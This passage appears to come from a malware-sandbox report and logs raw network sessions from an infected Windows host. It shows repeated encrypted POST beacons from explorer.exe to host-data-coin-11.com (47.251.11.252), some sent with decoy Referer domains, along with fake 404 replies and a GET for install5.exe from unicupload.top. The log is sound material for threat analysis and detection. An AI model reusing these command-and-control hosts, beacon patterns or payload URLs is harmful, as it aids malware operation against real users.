Dec 28, 2021 13:56:02.409766912 CET	10465	IN	Data Raw: a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Dec 28, 2021 13:56:02.409809113 CET	10466	IN	Data Raw: 00 6c 00 6f 00 63 00 61 00 6c 00 2e 00 63 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 78 38 36 5c 63 72 74 5c 73 72 63 5c 73 65 74 6c 6f 63 61 6c 2e 63 00 00 00 73 00 65 00 74 00 6c 00 6f 00 63 00 61 Data Ascii: local.cf:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.csetlocaleLC_MIN <= _category && _category <= LC_MAXstrncpy_s(lctemp, (sizeof(lctem
Dec 28, 2021 13:56:02.589534998 CET	10468	IN	Data Raw: 00 43 00 6f 00 64 00 65 00 50 00 61 00 67 00 65 00 2c 00 20 00 28 00 73 00 69 00 7a 00 65 00 6f 00 66 00 28 00 6e 00 61 00 6d 00 65 00 73 00 2d 00 3e 00 73 00 7a 00 43 00 6f 00 64 00 65 00 50 00 61 00 67 00 65 00 29 00 20 00 2f 00 20 00 73 00 69 Data Ascii: CodePage, (sizeof(names->szCodePage) / sizeof(names->szCodePage[0])), locale, len)strncpy_s(names->szCountry, (sizeof(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49854	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:04.853841066 CET	10824	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://clunuonr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: host-data-coin-11.com
Dec 28, 2021 13:56:04.853857994 CET	10825	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 84 de 94 66 5d 02 c9 a1 c1 64 48 cd de 0c Data Ascii: Nz1@D6YiwmDu$f]dH8l~CyhX5P'wcFv#o*NAEA.
Dec 28, 2021 13:56:05.407126904 CET	10830	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:56:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49857	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:05.972120047 CET	10831	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pebbfc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: host-data-coin-11.com
Dec 28, 2021 13:56:05.972239017 CET	10831	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 5b a8 bd 2c Data Ascii: Nz1@D6YiwmDu$f]d[,_ld{OlQR0KovE=e/ZQbA
Dec 28, 2021 13:56:06.542974949 CET	10832	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:56:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49858	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:06.744535923 CET	10833	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xkoocu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 359 Host: host-data-coin-11.com
Dec 28, 2021 13:56:06.747188091 CET	10833	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 4e d1 df 77 Data Ascii: Nz1@D6YiwmDu$f]dNwSi,eM$,3IP)d"^K(\|[FH\|(ywX&w_@SS-NM'ksUL;qX C:uj8'-~AL&BZ"n)uyg**
Dec 28, 2021 13:56:07.296400070 CET	10833	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:56:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49859	54.38.220.85	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:07.346076012 CET	10834	OUT	GET /install5.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: unicupload.top
Dec 28, 2021 13:56:07.363667965 CET	10835	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Tue, 28 Dec 2021 12:55:13 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49860	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:07.569057941 CET	10835	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xpkuvjioi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 144 Host: host-data-coin-11.com
Dec 28, 2021 13:56:07.569075108 CET	10836	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 17 b3 bc 04 Data Ascii: Nz1@D6YiwmDu$f]d)i2Je=4nP>j9NC/Z0"O@cUIW
Dec 28, 2021 13:56:08.121371984 CET	10836	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:56:07 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49861	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:08.681101084 CET	10837	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nxjfh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: host-data-coin-11.com
Dec 28, 2021 13:56:08.681123972 CET	10837	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 14 9b 9e 77 Data Ascii: Nz1@D6YiwmDu$f]dwPzaEL8C\:,lBis?'iHE2@8Q*6^YW!iaXAdu(+0Xe#Fo5y#MN=`Awm?aS'J;]
Dec 28, 2021 13:56:09.237057924 CET	10837	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:56:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49788	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:50.273237944 CET	1546	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oabgiwp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 245 Host: host-data-coin-11.com
Dec 28, 2021 13:54:50.273282051 CET	1546	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 23 d8 db 07 Data Ascii: Nz1@D6YiwmDu$f]d#7\.C:QPAO1Yamj[P2wITm@aT#%_U~4z~fVm)e4T~rQSq7? `Kla\|^!
Dec 28, 2021 13:54:50.826272011 CET	1547	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49862	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:09.457644939 CET	10838	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ithwflphmf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 167 Host: host-data-coin-11.com
Dec 28, 2021 13:56:09.457726955 CET	10838	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 19 dd 9f 1d Data Ascii: Nz1@D6YiwmDu$f]d#?8\%FqazvO\|PwRYy'nZQZ1v,;5Ib8 }P
Dec 28, 2021 13:56:10.024442911 CET	10839	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:56:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a Data Ascii: 3eI:82O@e,YR9?RBpw0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49790	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:51.034786940 CET	1548	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hwrkvn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 291 Host: host-data-coin-11.com
Dec 28, 2021 13:54:51.034816980 CET	1548	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 10 c8 db 2b Data Ascii: Nz1@D6YiwmDu$f]d+UDl`GMR#(jhO%Z)e6{I_)Oxw 8K?tM=S6Z8]<Dvi+bY5x~v)*^,bx`RvgV?bXwhIB[D
Dec 28, 2021 13:54:51.603113890 CET	1549	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49791	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:51.806477070 CET	1550	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oskoy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: host-data-coin-11.com
Dec 28, 2021 13:54:51.806488037 CET	1550	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 31 cf 92 19 Data Ascii: Nz1@D6YiwmDu$f]d15d4+PDG}Z2Z)3;05\T* ONdo(J'nN p+t.HM\|]6
Dec 28, 2021 13:54:52.354857922 CET	1551	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49792	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:52.559643030 CET	1552	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yhvtxw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 201 Host: host-data-coin-11.com
Dec 28, 2021 13:54:52.559665918 CET	1552	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 42 8b 9b 04 Data Ascii: Nz1@D6YiwmDu$f]dB>A)c*qAA}!3oK5Y%$#jQ&9I@M3rg-+I_ &Pa,,9#-K9{/GT7EU
Dec 28, 2021 13:54:53.118556976 CET	1552	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49793	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
